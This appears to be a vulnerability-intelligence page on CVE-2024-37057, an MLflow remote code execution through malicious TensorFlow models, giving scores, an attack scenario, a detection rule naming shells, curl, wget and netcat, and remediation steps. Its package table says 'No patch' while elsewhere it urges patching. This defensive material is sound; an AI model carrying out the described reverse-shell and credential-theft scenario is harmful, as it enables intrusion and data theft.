CVE-2024-37057: MLflow RCE — HIGH

CISO Take

Any MLflow deployment running ≥2.0.0rc0 is vulnerable to arbitrary code execution the moment a user loads a maliciously uploaded TensorFlow model — a routine action in every ML workflow. This is a supply chain attack: one compromised upload in a shared model registry can pivot to every data scientist workstation and CI/CD runner that pulls that model. Patch immediately, restrict model upload permissions, and audit your registry for untrusted artifacts.

What is the risk?

HIGH. CVSS 8.8 understates operational risk in ML environments — loading models from a shared registry is reflexive behavior, not a suspicious action, so users have zero threat awareness. Exploitation requires no special privileges in many default MLflow configurations (unauthenticated upload possible), and the attacker only needs one person to interact with the model. Blast radius includes developer workstations, automated retraining pipelines, and inference infrastructure. The low attack complexity and wide deployment of MLflow in enterprise ML stacks make this a high-priority remediation target.

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
MLflow	pip	—	No patch
26.6K OpenSSF 5.6 655 dependents Pushed 4d ago 31% patched ~51d to patch Full package profile →

Do you use MLflow? You're affected.

How severe is it?

CVSS 3.1

8.8 / 10

EPSS

0.6%

chance of exploitation in 30 days

Higher than 45% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

Exploit Available

Exploitation: MEDIUM

Sophistication

Trivial

Exploitation Confidence

medium

○ CISA SSVC: Public PoC

○ Public PoC indexed (trickest/cve)

Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV Network

AC Low

PR None

UI Required

S Unchanged

C High

I High

A High

What should I do?

6 steps

PATCH

Upgrade MLflow immediately — consult the HiddenLayer advisory for the minimum safe version.
ACCESS CONTROL

Treat model registry write access like code repository write access — require authentication, MFA, and role-based permissions for model uploads.
AUDIT

Review all TensorFlow models uploaded post-2024-01-01 for unexpected files, Lambda layers, or custom ops in SavedModel directories.
SANDBOX

Load models in isolated containers or VMs with no outbound network access and read-only filesystem mounts for all automated pipeline jobs.
SIGN AND VERIFY

Implement model artifact signing (e.g., Sigstore/cosign) and verify checksums before loading in any pipeline.
DETECT

Alert on process spawning (shells, curl, wget, netcat) or outbound network connections originating from model loading processes.

What does CISA's SSVC say?

Decision Attend

Exploitation poc

Automatable No

Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Supply Chain Code Execution Framework Model AML.T0010.003 - Model AML.T0011.000 - Unsafe AI Artifacts AML.T0018.002 - Embed Malware AML.T0049 - Exploit Public-Facing Application AML.T0058 - Publish Poisoned Models

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act

Art.9 - Risk management system

ISO 42001

A.10.1 - Third-party and supply chain AI risk A.6.1.5 - AI system security controls

NIST AI RMF

GOVERN-6.1 - AI supply chain risk policies MANAGE-2.2 - AI risk treatment mechanisms

OWASP LLM Top 10

LLM03 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2024-37057?

Any MLflow deployment running ≥2.0.0rc0 is vulnerable to arbitrary code execution the moment a user loads a maliciously uploaded TensorFlow model — a routine action in every ML workflow. This is a supply chain attack: one compromised upload in a shared model registry can pivot to every data scientist workstation and CI/CD runner that pulls that model. Patch immediately, restrict model upload permissions, and audit your registry for untrusted artifacts.

Is CVE-2024-37057 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2024-37057, increasing the risk of exploitation.

How to fix CVE-2024-37057?

1. PATCH: Upgrade MLflow immediately — consult the HiddenLayer advisory for the minimum safe version. 2. ACCESS CONTROL: Treat model registry write access like code repository write access — require authentication, MFA, and role-based permissions for model uploads. 3. AUDIT: Review all TensorFlow models uploaded post-2024-01-01 for unexpected files, Lambda layers, or custom ops in SavedModel directories. 4. SANDBOX: Load models in isolated containers or VMs with no outbound network access and read-only filesystem mounts for all automated pipeline jobs. 5. SIGN AND VERIFY: Implement model artifact signing (e.g., Sigstore/cosign) and verify checksums before loading in any pipeline. 6. DETECT: Alert on process spawning (shells, curl, wget, netcat) or outbound network connections originating from model loading processes.

What systems are affected by CVE-2024-37057?

This vulnerability affects the following AI/ML architecture patterns: model registry, training pipelines, model serving, MLOps platforms, model evaluation pipelines.

What is the CVSS score for CVE-2024-37057?

CVE-2024-37057 has a CVSS v3.1 base score of 8.8 (HIGH). The EPSS exploitation probability is 0.62%.

What is the AI security impact?

Affected AI Architectures

model registrytraining pipelinesmodel servingMLOps platformsmodel evaluation pipelines

MITRE ATLAS Techniques

AML.T0010.003 Model

AML.T0011.000 Unsafe AI Artifacts

AML.T0018.002 Embed Malware

AML.T0049 Exploit Public-Facing Application

AML.T0058 Publish Poisoned Models

Compliance Controls Affected

EU AI Act: Art.9

ISO 42001: A.10.1, A.6.1.5

NIST AI RMF: GOVERN-6.1, MANAGE-2.2

OWASP LLM Top 10: LLM03

What are the technical details?

Original Advisory

Deserialization of untrusted data can occur in versions of the MLflow platform running version 2.0.0rc0 or newer, enabling a maliciously uploaded Tensorflow model to run arbitrary code on an end user’s system when interacted with.

Exploitation Scenario

Adversary obtains write access to a shared MLflow instance — either via compromised contributor credentials, an exposed unauthenticated MLflow UI, or a malicious insider. They craft a TensorFlow SavedModel containing a malicious custom layer or serialized Python object that executes a reverse shell payload during model load. The model is published under a plausible name (e.g., 'gpt2-finetuned-internal-v3') with a slightly higher version number than the current production model. An automated retraining pipeline or a data scientist conducting model comparison pulls and loads the artifact — triggering execution. The attacker gains foothold on the runner or workstation, exfiltrates cloud provider credentials, training data, and proprietary model weights, then pivots laterally into the MLOps infrastructure.

Weaknesses (CWE)

CWE-502 Deserialization of Untrusted Data Primary CWE-502 Deserialization of Untrusted Data

CWE-502 — Deserialization of Untrusted Data: The product deserializes untrusted data without sufficiently ensuring that the resulting data will be valid.

[Architecture and Design, Implementation] If available, use the signing/sealing features of the programming language to assure that deserialized data has not been tainted. For example, a hash-based message authentication code (HMAC) could be used to ensure that data has not been modified.
[Implementation] When deserializing data, populate a new object rather than just deserializing. The result is that the data flows through safe input validation and that the functions are safe.

Source: MITRE CWE corpus.